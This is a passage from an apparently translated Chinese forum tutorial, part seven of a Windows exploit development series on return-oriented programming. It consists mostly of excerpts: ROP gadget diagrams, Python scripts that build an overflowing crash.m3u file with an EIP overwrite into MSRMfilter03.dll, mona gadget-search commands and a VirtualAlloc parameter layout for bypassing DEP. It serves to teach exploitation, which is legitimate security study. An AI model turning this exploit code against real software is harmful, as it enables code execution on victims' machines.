-
-
[翻译]Windows Exploit开发系列教程第七部分:返回导向编程(ROP)
-
发表于:
2016-1-13 18:04
27576
-
[翻译]Windows Exploit开发系列教程第七部分:返回导向编程(ROP)
(1) 指针直接执行retn (2) 指针指向一些指令+retn
ESP -> ???????? => RETN ESP -> ???????? => POP EAX # RETN
???????? => RETN ffffffff => we put this value in EAX
???????? => RETN ???????? => INC EAX # RETN
???????? => RETN ???????? => XCHG EAX,EDX # RETN
(1)这里retn仅仅是增加esp (2) 用配件将EDX清0
#!/usr/bin/python
import sys, struct
file="crash.m3u"
#---------------------------------------------------------------------#
# Badchars: '\x00\x09\x0A' #
#---------------------------------------------------------------------#
crash = "http://." + "A"*17416 + "B"*4 + "C"*7572
writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()
!mona modules
!mona ropfunc -m MSRMfilter03.dll -cpb '\x00\x09\x0a'
!mona rop -m MSRMfilter03.dll -cpb '\x00\x09\x0a'
#!/usr/bin/python
import sys, struct
file="crash.m3u"
rop = struct.pack('<L',0x41414141) # padding to compensate 4-bytes at ESP
#---------------------------------------------------------------------#
# Badchars: '\x00\x09\x0a' #
# kernel32.virtualalloc: 0x1005d060 (MSRMfilter03.dll) #
# EIP: 0x10019C60 Random RETN (MSRMfilter03.dll) #
#---------------------------------------------------------------------#
crash = "http://." + "A"*17416 + "\x60\x9C\x01\x10" + rop + "C"*(7572-len(rop))
writeFile = open (file, "w")
writeFile.write( crash )
writeFile.close()
结构: 参数:
LPVOID WINAPI VirtualAlloc( => A pointer to VirtualAlloc()
_In_opt_ LPVOID lpAddress, => Return Address (Redirect Execution to ESP)
_In_ SIZE_T dwSize, => dwSize (0x1)
_In_ DWORD flAllocationType, => flAllocationType (0x1000)
_In_ DWORD flProtect => flProtect (0x40)
);
[注意]传递专业知识、拓宽行业人脉——看雪讲师团队等你加入!
